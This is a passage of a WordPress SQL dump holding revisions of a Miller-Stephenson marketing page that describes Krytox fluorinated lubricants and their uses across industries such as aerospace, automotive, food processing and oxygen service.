degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-29 13:57:38', '2016-09-29 13:57:38', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2142, 2, '2016-09-29 14:05:02', '2016-09-29 14:05:02', '[row col_style="dashed"]\n\n[col span="4" span__sm="12"]\n\n<p><a href="#aerospace">Aerospace, Aviation, and National Defense</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Automotive - Squeak &amp; Rattle</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Automotive - Mechanical Systems</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Box Board Corrugating</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Chemical and Petrochemical</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Electronics / Semiconductor</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Food Processing</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Medical Industry</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Metal Processing</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Oxygen &amp; Reactive Gas Service</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Power Generation</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Pulp &amp; Paper</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Textile</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Tire Mold</a></p>\n\n[/col]\n\n[/row]\n<p><span style="font-size: 130%;"><strong>Krytox Lubricants Industries and Applications</strong></span></p>\n<p><a name="aerospace"></a><br />\n<strong>Aerospace, Aviation, and National Defense</strong></p>\n<ul>\n<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\n<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\n</ul>\n<p>Based on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:</p>\n<ul>\n<li>Low outgassing • Wide temperature range</li>\n<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\n<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\n</ul>\n<p>General Applications</p>\n<ul>\n<li>Bearings—all types</li>\n<li>Seals—valves and pumps</li>\n<li>O-rings—sealants, lubricants</li>\n</ul>\n<p>Aerospace-Specific Applications</p>\n<ul>\n<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\n<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\n<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\n<li>Mechanical components—spline shafts, control linkages</li>\n</ul>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Automotive—Squeak and Rattle</strong></p>\n<p>Miller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.</p>\n[ux_product_categories ids="37,46,96,97,98" number="10"]\n\n<p><strong>Automotive—Mechanical Systems</strong></p>\n<p>Design/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:</p>\n<ul>\n<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\n<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\n</ul>\n<p>The public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:</p>\n<ul>\n<li>A wide temperature range</li>\n<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\n<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\n<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\n<li>Chassis: wheel bearings, CV/universal joints</li>\n</ul>\n<p>• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers</p>\n<p>Krytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.</p>\n[ux_product_categories ids="37,46,96,97,98" number="10"]\n\n<p><strong>Chemical and Petrochemical</strong></p>\n<p>Miller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:</p>\n<ul>\n<li>Extended equipment life</li>\n<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\n<li>No ignition at pressures up to 350 bar</li>\n<li>Compatibility with polymers used in seals, O-rings, valves</li>\n<li>BAM certification</li>\n</ul>\n<p>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.</p>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Box Board Corrugating</strong></p>\n<p>Krytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:</p>\n<ul>\n<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\n<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\n<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\n<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\n</ul>\n<p>Krytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:</p>\n<ul>\n<li>ISO-9002 certified</li>\n<li>Long-term wear resistance</li>\n<li>Decreased wear and bearing failure</li>\n<li>Protection from rust and high-temperature corrosion</li>\n<li>No carbonization</li>\n<li>Superior lubricity</li>\n<li>Compatible with all metals, elastomers, and plastics</li>\n<li>Water, steam, and chemical resistant in the most severe environments</li>\n</ul>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Electronics/Semiconductor</strong></p>\n<p>Krytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:</p>\n<ul>\n<li>Wet and dry vacuum pumps</li>\n<li>Vacuum system sealants</li>\n<li>Clean rooms</li>\n<li>Robotics</li>\n<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\n<li>Bearings</li>\n<li>Valves</li>\n<li>Seals</li>\n<li>O-rings</li>\n<li>Chains</li>\n<li>Compressors</li>\n<li>Gear boxes</li>\n<li>Mechanical pumps and other components</li>\n</ul>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Food Processing</strong></p>\n<p>Krytox lubricants for use in the food processing industry are:</p>\n<ul>\n<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\n<li>Able to protect bearings and other components under all load and speed conditions</li>\n<li>Available in a full line of H-1 PFPE lubricants</li>\n</ul>\n<p>Krytox oils and greases offer unmatched stability and flexibility:</p>\n<ul>\n<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\n<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\n<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\n</ul>\n[ux_product_categories ids="96,46,38,97" number="10"]\n\n<p><strong>Medical Industry Equipment Applications </strong></p>\n<p>In medical applications, Krytox lubricants offer safety and efficacy:</p>\n<ul>\n<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\n</ul>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Metal Processing </strong></p>\n<p>With high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.</p>\n[ux_product_categories ids="40,115,116,123" number="10"]\n\n<p><strong>Oxygen and Reactive Gas Service </strong></p>\n<p>When working with reactive gas equipment, failure is not an option.</p>\n<p>Conventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.</p>\n<p>Reactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:</p>\n<ul>\n<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\n<li>No ignition at pressures up to 350 bar</li>\n<li>Compatibility with polymers used in seals, O-rings, and valves</li>\n<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\n</ul>\n<p>Lubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.</p>\n[ux_product_categories ids="36,38,115,116" number="10"]\n\n<p><strong>Power Generation</strong></p>\n<p>Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.</p>\n<p>Krytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:</p>\n<ul>\n<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\n<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\n<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\n</ul>\n[ux_product_categories ids="40,171,96,97" number="10"]\n\n<p><strong>Pulp and Paper</strong></p>\n<p>Choose the lubricant that can move pulp and paper productivity to new levels.</p>\n<p>In the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:</p>\n<ul>\n<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\n<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\n<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\n</ul>\n<p>As in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.</p>\n<p>Krytox technology can help provide the best available equipment performance and lowest available life cycle cost through:</p>\n<ul>\n<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\n<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\n</ul>\n[ux_product_categories ids="46,96" number="10"]\n\n<p><strong>Textile</strong></p>\n<p>Krytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.</p>\n<p>Krytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:</p>\n<ul>\n<li>ISO-9002 certified</li>\n<li>No oxidation or degradation</li>\n<li>Protection from rust and high-temperature corrosion</li>\n<li>Superior lubricity</li>\n<li>Compatible with all metals, elastomers, and plastics</li>\n<li>Compatible with oxygen and chlorine</li>\n</ul>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Tire Mold</strong></p>\n<p>Krytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.</p>\n<ul>\n<li>High temperature performance</li>\n<li>Extended re-application interval</li>\n<li>Excellent adhesion</li>\n<li>High hydrolytic stability</li>\n<li>Elimination of carbon residue build-up on molds</li>\n</ul>\n[ux_product_categories ids="143" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-29 14:05:02', '2016-09-29 14:05:02', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2143, 2, '2016-09-29 14:07:03', '2016-09-29 14:07:03', '[row col_style="dashed"]\n\n[col span="4" span__sm="12"]\n\n<p><a href="#aerospace">Aerospace, Aviation, and National Defense</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Automotive - Squeak &amp; Rattle</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Automotive - Mechanical Systems</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Box Board Corrugating</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Chemical and Petrochemical</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Electronics / Semiconductor</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Food Processing</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Medical Industry</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Metal Processing</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Oxygen &amp; Reactive Gas Service</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Power Generation</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Pulp &amp; Paper</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Textile</a></p>\n\n[/col]\n[col span="4" span__sm="12"]\n\n<p><a href="#bearings">Tire Mold</a></p>\n\n[/col]\n\n[/row]\n<p><span style="font-size: 130%;"><strong>Krytox Lubricants Industries and Applications</strong></span></p>\n<p><a name="aerospace"></a><br />\n<strong>Aerospace, Aviation, and National Defense</strong></p>\n<ul>\n<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\n<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\n</ul>\n<p>Based on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:</p>\n<ul>\n<li>Low outgassing • Wide temperature range</li>\n<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\n<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\n</ul>\n<p>General Applications</p>\n<ul>\n<li>Bearings—all types</li>\n<li>Seals—valves and pumps</li>\n<li>O-rings—sealants, lubricants</li>\n</ul>\n<p>Aerospace-Specific Applications</p>\n<ul>\n<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\n<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\n<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\n<li>Mechanical components—spline shafts, control linkages</li>\n</ul>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Automotive—Squeak and Rattle</strong></p>\n<p>Miller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.</p>\n[ux_product_categories ids="37,46,96,97,98" number="10"]\n\n<p><strong>Automotive—Mechanical Systems</strong></p>\n<p>Design/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:</p>\n<ul>\n<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\n<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\n</ul>\n<p>The public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:</p>\n<ul>\n<li>A wide temperature range</li>\n<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\n<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\n<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\n<li>Chassis: wheel bearings, CV/universal joints</li>\n</ul>\n<p>• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers</p>\n<p>Krytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.</p>\n[ux_product_categories ids="37,46,96,97,98" number="10"]\n\n<p><strong>Chemical and Petrochemical</strong></p>\n<p>Miller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:</p>\n<ul>\n<li>Extended equipment life</li>\n<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\n<li>No ignition at pressures up to 350 bar</li>\n<li>Compatibility with polymers used in seals, O-rings, valves</li>\n<li>BAM certification</li>\n</ul>\n<p>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.</p>\n[ux_product_categories ids="36,38,34" number="10"]\n\n<p><strong>Box Board Corrugating</strong></p>\n<p>Krytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:</p>\n<ul>\n<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\n<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\n<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\n<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\n</ul>\n<p>Krytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:</p>\n<ul>\n<li>ISO-9002 certified</li>\n<li>Long-term wear resistance</li>\n<li>Decreased wear and bearing failure</li>\n<li>Protection from rust and high-temperature corrosion</li>\n<li>No carbonization</li>\n<li>Superior lubricity</li>\n<li>Compatible with all metals, elastomers, and plastics</li>\n<li>Water, steam, and chemical resistant in the most severe environments</li>\n</ul>\n[ux_product_categories ids="46,96" number="10"]\n\n<p><strong>Electronics/Semiconductor</strong></p>\n<p>Krytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:</p>\n<ul>\n<li>Wet and dry vacuum pumps</li>\n<li>Vacuum system sealants</li>\n<li>Clean rooms</li>\n<li>Robotics</li>\n<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\n<li>Bearings</li>\n<li>Valves</li>\n<li>Seals</li>\n<li>O-rings</li>\n<li>Chains</li>\n<li>Compressors</li>\n<li>Gear boxes</li>\n<li>Mechanical pumps and other components</li>\n</ul>\n[ux_product_categories ids="156,46,96" number="10"]\n\n<p><strong>Food Processing</strong></p>\n<p>Krytox lubricants for use in the food processing industry are:</p>\n<ul>\n<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\n<li>Able to protect bearings and other components under all load and speed conditions</li>\n<li>Available in a full line of H-1 PFPE lubricants</li>\n</ul>\n<p>Krytox oils and greases offer unmatched stability and flexibility:</p>\n<ul>\n<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\n<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\n<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\n</ul>\n[ux_product_categories ids="96,46,38,97" number="10"]\n\n<p><strong>Medical Industry Equipment Applications </strong></p>\n<p>In medical applications, Krytox lubricants offer safety and efficacy:</p>\n<ul>\n<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\n</ul>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Metal Processing </strong></p>\n<p>With high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.</p>\n[ux_product_categories ids="40,115,116,123" number="10"]\n\n<p><strong>Oxygen and Reactive Gas Service </strong></p>\n<p>When working with reactive gas equipment, failure is not an option.</p>\n<p>Conventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.</p>\n<p>Reactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:</p>\n<ul>\n<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\n<li>No ignition at pressures up to 350 bar</li>\n<li>Compatibility with polymers used in seals, O-rings, and valves</li>\n<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\n</ul>\n<p>Lubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.</p>\n[ux_product_categories ids="36,38,115,116" number="10"]\n\n<p><strong>Power Generation</strong></p>\n<p>Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.</p>\n<p>Krytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:</p>\n<ul>\n<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\n<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\n<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high 